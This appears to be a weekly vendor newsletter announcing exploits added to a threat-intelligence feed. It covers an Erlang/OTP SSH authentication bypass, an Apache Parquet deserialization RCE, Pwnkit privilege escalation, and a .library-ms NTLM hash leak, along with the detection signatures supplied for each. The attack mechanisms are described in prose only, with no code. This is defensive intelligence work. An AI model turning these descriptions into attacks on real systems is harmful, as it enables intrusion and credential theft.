Happy Friday! Here is the content the VulnCheck Initial Access Intelligence team delivered this week:
The team added an exploit for the Erlang/OTP SSH library authentication bypass. This vulnerability currently has an EPSS percentile of 0.87 and more than a dozen public exploits, indicating that internet-wide exploitation attempts are very likely.
This exploit takes advantage of opening an SSH channel outside the expected authentication path, allowing attackers to spawn an execution channel before authentication. The vulnerability utilizes an execution channel that, in the context of Erlang, launches an interpreter—meaning savvy attackers could write post-exploitation components directly in Erlang and potentially evade detection mechanisms. The team accounted for this and provided PCAPs and signatures detecting this variant technique.
Open-source usage of the library does not appear to be widespread, but the team identified a few hundred Erlang SSH servers exposed to the internet.
This week we bring you a proof of concept for a Java deserialization issue in the Apache Parquet library's Avro schema parsing. This library is popular in projects like Apache Spark. The issue is perhaps better described as an arbitrary class instantiation, which can lead to RCE if the targeted class is in the application's classpath.
We created a custom Docker target and exploit to demonstrate said RCE. The supplied target is based on this public PoC. JLine 2.14.6 was added to make it exploitable for RCE. Target validation and version scanning are not supported in the exploit, since the target we created is generic.
Our friends over at AttackerKB describe exploiting this vulnerability (not for RCE) in a Google Cloud data pipeline, but other real-world targets have yet to be disclosed. We have also supplied a PCAP of our exploitation and network signatures to (hopefully) detect generic exploitation over TCP. Queries will be added if real-world targets are discovered.
By request, an exploit for the "Pwnkit" vulnerability was added to the feed this week. Vulnerable versions of pkexec do not check argc before attempting to iterate through and make use of the passed arguments. This allows attackers to provide an empty array and specific environment variables to argv when running pkexec via execve(). Ultimately, this allows writing a malicious gconv library to be executed by pkexec as root, resulting in privilege escalation.
There is a quirk to the applicability of this vulnerability, as it was patched both by an update to Polkit and by a separate patch later added to the Linux kernel that prevents exploitation as well. That said, for a host to be vulnerable, it needs to be running an outdated version of Polkit and a kernel missing the relevant patch.
Given that this is a local exploit, there are no queries or network rules. The exploit comes with two separate Docker containers. One container runs a virtual machine using QEMU to expose an SSH server on a system using an unpatched kernel and a vulnerable version of Polkit. The second container skips the QEMU step and just runs the SSH server in a container with a vulnerable version of Polkit; this container must be run from a host with an unpatched kernel and was added for specific client needs.
CVE-2025-24054 is a recent addition to CISA KEV. This vulnerability was observed by Checkpoint to be used across multiple campaigns targeting government and industry in Romania and Poland.
This vulnerability is triggered when a user extracts or previews a ZIP archive containing a malicious .library-ms file, triggering Windows Explorer to initiate an SMB authentication request to a remote server. As a result, it leaks the user’s NTLM hash without any user interaction. The team delivers an exploit to generate malicious payloads and demonstrates how to catch the SMB authentication request.